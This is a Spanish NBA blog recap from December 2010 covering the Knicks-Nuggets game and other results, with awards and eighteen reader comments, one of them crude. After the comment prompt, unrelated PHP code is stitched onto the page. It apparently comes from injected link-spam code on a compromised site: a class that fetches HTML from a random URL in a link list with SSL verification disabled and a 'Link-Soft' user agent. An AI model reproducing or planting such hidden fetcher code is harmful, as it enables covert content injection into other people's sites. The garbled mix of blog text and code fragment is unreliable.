La Crónica (12/12/2010)

13 de December de 2010 por TheDeerHunter

Como ya algunos de nuestros lectores decíais anoche, espectacular partido el que nos ofrecieron los Knicks y los Nuggets ayer por la tarde en un escenario tan majestuoso como es el Madison Square Garden. Los locales se llevaron el gato al agua por nada menos que 125-129, en una actuación colectiva extraordinaria con 6 hombres en dobles figuras, destacando por encima de todos la tríada Felton-Chandler-Stat. Carmelo quiso gustar ante el que podría ser el próximo destino en su carrera, lanzándose 27 tiritos para sumar 31 puntos que cerca estuvieron de amargar la noche al que podría ser su público muy pronto. Nené, Harrington y Lawson le ayudaron bien, pero no así Billups que se encuentra fuera de forma toda la campaña. Los Knicks, de esta manera, suman la 8ª victoria consecutiva. Se trata de un hito que no tenía lugar desde hacía 16 años.

Otro partido que estuvo muy bien fue el Lakers@New Jersey (99-92). Los campeones tuvieron que poner cara de perro para llevarse un choque que se les complicó muchísimo en la segunda parte. Entre que Gasol está flojo y que los árbitros no le ayudan demasiado, Brook Lopez y Derrick Favors se confabularon para inflingirle todo el castigo del que fueron capaces. En esta ocasión Lamar Odom dio el paso adelante para equilibrar el juego interiory junto con las genialidades de Kobe cerraron un resultado muy positivo tal y como se pusieron las cosas.

Por su parte, Oklahoma destrozó a Cleveland 77-106 en la 8ª derrota consecutiva de éstos y Orlando doblegó a los Clippers a pesar del enésimo partidazo de Blake Griffin (94-85). En esta ocasión los de Florida volvieron a recordar al gran colectivo que han sido, jugando Lewis de 3 y Bass por dentro, como llevamos pidiendo desde hace mucho tiempo. El invento parece que funcionó bien.

Para terminar dos palizones inesperados. Los Hornets dieron vergüenza ajena ante los Sixers (70-88). El único que dio la cara fue Chris Paul pero con partidos como ese no sabemos cómo no se le quitan las ganas de luchar. Y por último los Spurs no tuvieron ningún problema en mantener el liderato ante unos Blazers impotentes (78-95).

PREMIOS

MVP: Sonríen en New York y en gran parte es gracias a Amare Stoudamire que partido a partido calla las bocas de los que decían que sin Nash sus números bajarían. Anoche fue de nuevo el estilete de los Knicks con 30 puntos, 8 rebotes, 4 asistencias y 3 tapones.

Rookie: Si no pasa nada sorprendenete, el título de rookie del año parecer tener dueño. Blake Griffin volvió a salirse con 27 puntos, 16 rebotes y 5 asistencias. La pregunta empieza a ser, ¿merece ir al All-Stars de los mayores? Y lo de Landry Fields tambiém merece ser digno de estudio, 18 puntos y 9 rebotes.

Sorpresa: Nada se ha salido de la normalidad a nivel individual en el día de hoy. Tal vez destacar los 22 puntos de George Hill que parece que no, pero sigue siendo una pieza importante en el entramado Spur.

Decepción: Horrible, horribilísimo partido de los Hornets vapuleados de principio a fin por los, a priori, débiles Sixers. 2 de 11 de Trevor Ariza y 0 de 7 de Willie Green. Dos jugadores que da la sensación han engañado la mar de bien a los dirigentes de New Orleans.

Esfuerzo en vano: Por un lado el de Blake Griffin, un clásico de estas tierras y por el otro Carmelo Anthony que a pesar de sus 31 puntos y 13 rebotes cayó ante su posible futuro equipo.

Comenta

18 comentarios a esta entrada

  1. Sr. Lagarto dice:
    #1

    Lo de Griffin es sencillamente espectacular y si nos atenemos a los números yo creo que debería estar en el All-Star de los mayores. Otra cosa es si la gente va a votar tanto a alguien en una franquicia por debajo del 50% en victorias.

    Saludos.
    Lagarto.

      Citar

  2. Viva_Dirk dice:
    #2

    Debe ser un fijo Griffin en el All-Star si mantiene este nivel elegido por aficionados no creo que vaya, pero el técnico que sea deberia contar con el seguro.

      Citar

  3. CAMPO2 dice:
    #3

    Vaya canalla esta hecho farmar, ayer en los últimos 4 minutos se tiro todo lo que le pasaba por las manos, ya podrían haber seguido jugando con Lopez que estaba superando a gasol.

      Citar

  4. sergio dice:
    #4

    Si no fuese por el porcentaje en libres de Griffin… seria un top 10 seguro en valoración. Pero tambien creo que la competencia en el Oeste es muy fuerte y que el nivel de victorias-derrotas deberia influir. Supongo que Kevin Love tambien esta en la misma tesitura.

    Gente como Gasol, Odom, Millsap, Randolph, West, Hilario, Jefferson, Duncan o Aldridge tienen valoraciones similares y mejor record.

      Citar

  5. alfin dice:
    #5

    a ver, love y griffin son grandes y jovenes pivotes que se merecerian ir al allstar, griffin destaca mas porque es mucho mas espectacular y love es mucho love.

      Citar

  6. busky23 dice:
    #6

    Poco a poco con Griffin,su impacto ha sido notable,es un futuro All-Star,por numeros y espectacularidad pero de hay a verlo participar con los mayores habra que esperar almenos un año.
    Yo he votado esta mañana y Blake compite en su posición con gente como Gasol,Duncan,Randolph,Durant,Nowitzki,Aldridge,Carmelo,Beasley,K.Love,Odom,Scola…vamos,que la competencia en el puesto de Forward en el Oeste es complicada.

      Citar

  7. Vader dice:
    #7

    Partidazo de Stat pero tambien partidazo de Felton, 18 puntos y 17 asistencias con sólo dos pérdidas de balón.

    Luego el tema de Landry Fields 18 puntos, 9 rebotes, 3 asistencias, 2 robos, un tapon ¡¡¡Y sólo una pérdida de balón en casi 44 minutos de juego!!! Siempre me fijo en este dato con este jugador porque es increible los pocos balones que pierde. Leyendo un poco sobre Fields me he enterado de que es de los pocos del draft que ha completado sus cuatro años de universidad y parece que en este caso le ha ido muy bien para llegar a la liga muy bien formado y con unos fundamentos que ya quisieran algunos de los jugadores top que tienen condiciones físicas bestiales pero no tienen ninguna lectura del juego.

    En fin que los fans de los Knicks estamos en una nube y más leyendo los rumores que apuntan a que Carmelo sólo piensa en jugar el New York el año que viene y que sólo firmaria su extensión si es traspasado a los Knicks. Ya me extraña que esto finalmente sea así con una amenaza de lockout en el horizonte y el peligro siempre real de cualquier lesión… renunciar a 65 millones de dólares… desde luego si lo hace y fuerza su traspaso a los Knicks o espera hasta el verano para firmar libre será el ídolo del Madison.

    Saludos!!

      Citar

  8. TX dice:
    #8

    Hombre, yo creo que Griffin tendría que ser All-Star desde este año. No solo hace unos numeros bastante buenos para el All-Star de mayores si no que es espectacular, y al final es lo que quieres ver en un All-Star: pasartelo bien y que haya espectaculo en vez de quedarse en ser eficiente (que ya habrá otro momento para serlo).
    Yo por eso no votaré ni a Gasol, ni Scola, ni Duncan (me duele), ni Kevin Love por muy buenas estadísticas que tengan.
    Dicho todo esto:
    ¡¡Blake Griffin All-Star!!

      Citar

  9. Vader dice:
    #9

    Yo tambien apuesto por Griffin en el All-Star porque es un jugador que reune eficiencia con espectacularidad. Eso si creo que este año Gasol merece ser titular, con los números que esta haciendo…

    Saludos!

      Citar

  10. LEmontus dice:
    #10

    solo podré reir cuando ha habido gente que pensaba que wall seria el ROY… no solo no lo será si no que será u nº 1 más y mira que le están dando bola en wizards.

      Citar

  11. Denise dice:
    #11

    Bueno, wall no será ROY por la lesión de Griffin el año pasado, si no, sería ROY indiscutiblemente, porque la hornada de rookies de este año es bastante pésima por el momento

      Citar

  12. Denise dice:
    #12

    Humphries con la Kardashian (la que está buena, no la de Odom)???
    Pues supongo que Humphries tendrá un rabo enorme, o si no no le encuentro la explicación, feo es un rato, y por dinero no está la Kardashian con él, ….

      Citar

  13. AndiD dice:
    #13

    Totalmente de acuerdo en que Griffin es ESPECTACULAR.
    Pero cada vez que le veo jugar sólo pienso que en cualquier momento va a caer en una mala postura, o chocar con alguien o algo similar… y se va a lesionar.
    En serio, me parece que lo da TODO en cada rebote, tapón, etc. y que “abusa” demasiado de su potencia de salto (quién pudiera decir algo así, jajjaja).
    Espero equivocarme y que esté sano mucho tiempo, pero no dejo de sufrir por él cada vez que le veo dar esos saltos 🙂

      Citar

  14. Rompe dice:
    #14

    Parece que no está haciendo “demasiado ruido”, pero la temporada de Dirk está siendo acojonante! Aparte del record de su equipo, casi nada, está en los mejores porcentajes de tiro de toda su carrera, que se dice pronto!

      Citar

  15. Viva_Dirk dice:
    #15

    Ahora que lo ha dicho Rompe puedo decirlo yo, jeje, efectivamente espectacular temporada hasta la fecha de Nowitzki, con menos físico por el paso de la edad esta siendo mas efectivo que nunca.

      Citar

  16. HeiNeKeN dice:
    #16

    Si Denise, esta con la buena xD, Humphries jugooon!!!

      Citar

  17. Rompe dice:
    #17

    Para cuando esa entrada con las novias de los jugones?? xD

      Citar

  18. Denise dice:
    #18

    Yo puedo preparar una entrada..pero para Navidad o un poco después, que estoy muy liado con el curro.
    Aunque las más famosas, las conocemos todos.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>